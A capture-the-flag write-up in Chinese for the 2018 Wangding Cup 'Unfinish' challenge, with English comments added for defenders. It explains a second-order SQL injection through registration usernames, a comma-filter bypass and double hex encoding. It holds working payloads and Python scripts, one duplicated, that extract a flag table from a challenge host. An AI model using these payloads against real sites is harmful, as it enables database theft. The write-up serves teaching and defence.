[网鼎杯2018]Unfinish
[网鼎杯2018]Unfinish
0x01.前言
- 过滤了逗号 `,`，分割时使用 `from 1 for 10` 绕过
- `0'+hex编码要读取的信息+'0`
- 要进行二次编码，一次编码会被截断：MySQL 中 `+` 是数值加法，字符串转成数字时遇到第一个非数字字符就停止；一次 hex 的结果里可能含有 A–F 字母，二次 hex 之后只剩数字
解法1
payload:0'+(select substr(hex(hex((select * from flag))) from 1 for 10))+'0
脚本
#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
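# Solution 1 from the write-up, re-indented (the page's listing lost its
# indentation). Each iteration registers a fresh account whose username is the
# SQL fragment, logs in with that account, and prints the text of the first
# <span> on the returned page.
#
# What this shows a defender: the username is accepted at registration and is
# only evaluated later, when the post-login page is rendered (second-order
# injection). The server code is not shown on this page; presumably the stored
# username is concatenated into a later query -- TODO confirm against the
# challenge source. The fix belongs on the server: bind stored values as
# parameters in every query that reads them, not only at insert time, and do
# not rely on a character blacklist (the write-up notes that filtering ","
# was sidestepped with FROM ... FOR).
# Telltale traffic: one client registering many accounts with sequential
# e-mail addresses and usernames that contain quotes and SQL keywords.

# requests has no default timeout; without one a stalled instance hangs the run.
REQUEST_TIMEOUT = 10  # seconds

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    # NOTE(review): this Referer names an unrelated site and looks like a
    # leftover from another script -- confirm whether the target checks it.
    'Referer': "https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
    'Accept': 'application/json, text/javascript, */*; q=0.01'
}
# Page-specific challenge instance taken from the write-up.
url_log = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'

for i in range(0, 100):
    # Chunk i asks for 10 characters of the doubly hex-encoded value,
    # starting at position 1 + i*10.
    payload = "0'+(select substr(hex(hex((select * from flag))) from {} for 10))+'0".format(1 + i * 10)
    # One account per chunk, so the e-mail address carries the loop index.
    email = "11111231{}@qq.com".format(i)
    data_reg = {"email": email, "username": payload, "password": "123"}
    data_log = {"email": email, "password": "123"}

    requests.post(url_reg, headers=headers, data=data_reg, timeout=REQUEST_TIMEOUT)
    time.sleep(1)
    res = requests.post(url_log, headers=headers, data=data_log, timeout=REQUEST_TIMEOUT)

    span = BeautifulSoup(res.text, 'html.parser').span
    if span is None:
        # The original dereferenced soup.span unconditionally and died with an
        # AttributeError when the page had no <span>; report and stop instead.
        print("no <span> in login response for {} (HTTP {})".format(email, res.status_code))
        break
    print(span.text)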
解法2
payload:0'+ascii(substr((select * from flag) from {} for 1))+'0
脚本
#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
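# Solution 2 from the write-up, re-indented (the page's listing lost its
# indentation). Each iteration registers a fresh account whose username is the
# SQL fragment, logs in with that account, and reads the text of the first
# <span> on the returned page; with this payload that text is one character
# code per request.
#
# What this shows a defender: the username is accepted at registration and is
# only evaluated later, when the post-login page is rendered (second-order
# injection). The server code is not shown on this page; presumably the stored
# username is concatenated into a later query -- TODO confirm against the
# challenge source. The fix belongs on the server: bind stored values as
# parameters in every query that reads them, not only at insert time.
# Telltale traffic: one client registering many accounts with sequential
# e-mail addresses and usernames that contain quotes and SQL keywords.

# requests has no default timeout; without one a stalled instance hangs the run.
REQUEST_TIMEOUT = 10  # seconds

# Accumulates the per-position values as ",v1,v2,..." (leading comma kept from
# the original). Renamed from `str`, which shadowed the builtin.
collected = ''

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    # NOTE(review): this Referer names an unrelated site and looks like a
    # leftover from another script -- confirm whether the target checks it.
    'Referer': "https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
    'Accept': 'application/json, text/javascript, */*; q=0.01'
}
# Page-specific challenge instance taken from the write-up.
url_log = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'

for i in range(1, 100):
    # Position i of the value, one character per request.
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i)
    # One account per position, so the e-mail address carries the loop index.
    email = "111112{}@qq.com".format(i)
    data_reg = {"email": email, "username": payload, "password": "123"}
    data_log = {"email": email, "password": "123"}

    requests.post(url_reg, headers=headers, data=data_reg, timeout=REQUEST_TIMEOUT)
    time.sleep(1)
    res = requests.post(url_log, headers=headers, data=data_log, timeout=REQUEST_TIMEOUT)

    span = BeautifulSoup(res.text, 'html.parser').span
    if span is None:
        # The original dereferenced soup.span unconditionally and died with an
        # AttributeError when the page had no <span>; report and stop instead.
        print("no <span> in login response for {} (HTTP {})".format(email, res.status_code))
        break
    print(span.text)
    collected = collected + ',' + span.text

# Printed once after the loop; the page's listing is flat, so whether the
# original printed the running value on every iteration cannot be recovered.
print(collected)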
#coding:utf-8
import requests
import re
import time
from bs4 import BeautifulSoup
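# Second copy of the solution 2 listing (the page prints it twice), re-indented
# because the page's listing lost its indentation. Each iteration registers a
# fresh account whose username is the SQL fragment, logs in with that account,
# and reads the text of the first <span> on the returned page.
#
# For defenders: the username is evaluated only after it has been stored,
# when the post-login page is rendered (second-order injection). The server
# code is not shown on this page; presumably the stored username is
# concatenated into a later query -- TODO confirm. Bind stored values as
# parameters in every query that reads them.

# requests has no default timeout; without one a stalled instance hangs the run.
REQUEST_TIMEOUT = 10  # seconds

# Accumulates the per-position values as ",v1,v2,..." (leading comma kept from
# the original). Renamed from `str`, which shadowed the builtin.
collected = ''

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    # NOTE(review): this Referer names an unrelated site and looks like a
    # leftover from another script -- confirm whether the target checks it.
    'Referer': "https://www.lagou.com/jobs/list_python/p-city_252?px=default&gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1",
    'Accept': 'application/json, text/javascript, */*; q=0.01'
}
# Page-specific challenge instance taken from the write-up.
url_log = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'
url_reg = 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'

for i in range(1, 100):
    # Position i of the value, one character per request.
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i)
    # One account per position, so the e-mail address carries the loop index.
    email = "111112{}@qq.com".format(i)
    data_reg = {"email": email, "username": payload, "password": "123"}
    data_log = {"email": email, "password": "123"}

    requests.post(url_reg, headers=headers, data=data_reg, timeout=REQUEST_TIMEOUT)
    time.sleep(1)
    res = requests.post(url_log, headers=headers, data=data_log, timeout=REQUEST_TIMEOUT)

    span = BeautifulSoup(res.text, 'html.parser').span
    if span is None:
        # The original dereferenced soup.span unconditionally and died with an
        # AttributeError when the page had no <span>; report and stop instead.
        print("no <span> in login response for {} (HTTP {})".format(email, res.status_code))
        break
    print(span.text)
    collected = collected + ',' + span.text

# Printed once after the loop; the page's listing is flat, so whether the
# original printed the running value on every iteration cannot be recovered.
print(collected)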